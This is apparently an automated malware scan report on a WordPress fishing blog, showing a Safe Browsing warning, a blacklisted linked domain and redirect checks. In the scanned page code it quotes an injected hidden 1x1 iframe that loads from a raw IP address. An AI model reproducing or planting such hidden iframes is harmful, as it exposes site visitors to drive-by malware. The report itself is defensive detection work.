Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blog.holdmyrod.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://blog.holdmyrod.com/ | 200 OK Content-Length: 5566 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hmr-blog.dnfowler.com <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <title>HoldMyRod Blog | Simplify your fishing experience.</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="stylesheet" type="text/css" media="all" href="http://hmr-blog.dnfowler.com/wp-content/themes/twentyten/style.css" /> <link rel="pingback" href="http://hmr-blog.dnfowler.com/xmlrpc.php" /> <link rel="alternate" type="application/rss+xml" title="HoldMyRod Blog » Feed" href="http://hmr-blog.dnfowler.com/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="HoldMyRod Blog » Comments Feed" href="http://hmr-blog.dnfowler.com/?feed=comments-rss2" /& ...[4251 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://176.31.24.102/post.php?id=2031291779 <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=1 src=http://176.31.24.102/post.php?id=2031291779> | ||
http://blog.holdmyrod.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 01:40:49 GMT Location: http://blog.holdmyrod.com/test404page.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://hmr-blog.dnfowler.com/xmlrpc.php | clean |
http://blog.holdmyrod.com/test404page.js/ | 200 OK Content-Length: 5566 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hmr-blog.dnfowler.com <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <title>HoldMyRod Blog | Simplify your fishing experience.</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="stylesheet" type="text/css" media="all" href="http://hmr-blog.dnfowler.com/wp-content/themes/twentyten/style.css" /> <link rel="pingback" href="http://hmr-blog.dnfowler.com/xmlrpc.php" /> <link rel="alternate" type="application/rss+xml" title="HoldMyRod Blog » Feed" href="http://hmr-blog.dnfowler.com/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="HoldMyRod Blog » Comments Feed" href="http://hmr-blog.dnfowler.com/?feed=comments-rss2" /& ...[4251 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://176.31.24.102/post.php?id=2031291779 <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=1 src=http://176.31.24.102/post.php?id=2031291779> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blog.holdmyrod.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 01:40:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://hmr-blog.dnfowler.com/xmlrpc.php
GET / HTTP/1.1
Host: blog.holdmyrod.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 01:40:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://hmr-blog.dnfowler.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: blog.holdmyrod.com
Referer: http://www.google.com/search?q=blog.holdmyrod.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blog.holdmyrod.com
Referer: http://www.google.com/search?q=blog.holdmyrod.com
Result:
The result is similar to the first query. There are no suspicious redirects found.